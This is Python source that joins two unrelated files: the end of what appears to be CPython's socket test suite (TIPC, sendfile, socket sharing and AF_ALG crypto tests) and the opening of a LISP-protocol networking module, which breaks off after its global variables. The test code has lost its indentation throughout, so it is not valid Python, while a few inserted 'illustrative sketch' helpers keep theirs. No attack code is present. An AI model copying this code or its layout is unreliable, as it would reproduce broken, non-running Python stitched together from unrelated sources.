nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
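# Illustrative sketch (defined for reference, never called by the
# tests): recv_into() fills any writable buffer directly, as the tests
# above show for array, bytearray and memoryview.
def _example_recv_into():
    import socket
    a, b = socket.socketpair()
    with a, b:
        a.sendall(b"payload")
        buf = bytearray(1024)
        n = b.recv_into(memoryview(buf))  # no intermediate bytes object
        return bytes(buf[:n])  # b"payload"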
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's OK if the file does not exist, is a directory, or if we
# don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
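# Illustrative sketch (defined for reference, never called by the
# tests): sockets are non-inheritable by default since PEP 446
# (Python 3.4); on POSIX the flag maps onto FD_CLOEXEC.
def _example_inheritable():
    import socket
    with socket.socket() as s:
        assert s.get_inheritable() is False  # default since PEP 446
        s.set_inheritable(True)  # clears FD_CLOEXEC on POSIX
        return s.get_inheritable()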
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0 means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be a classmethod, not a staticmethod, or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking sockets,
# since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then Windows will have
# picked the correct value internally. Python introspection on the
# socket, however, will still return 0. For the shared socket, the
# Python value is recreated from the actual value, so the two may
# not compare equal.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
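# Illustrative sketch (defined for reference, never called by the
# tests): the two halves of the Windows-only share()/fromshare()
# hand-off tested above.  target_pid and the IPC channel that carries
# the bytes between processes are up to the caller.
def _example_share(sock, target_pid):
    data = sock.share(target_pid)  # bytes blob valid only for target_pid
    # ...send `data` to the other process (pipe, queue, socket, ...)...
    return data

def _example_fromshare(data):
    import socket
    return socket.fromshare(data)  # rebuilds the socket in the receiver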
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run, return either the send()-
# based or the sendfile()-based implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non-regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer, the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
lisp.py
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. The first dictionary array is indexed by device
# name and the second one has value lisp_interface() indexed by an
# instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
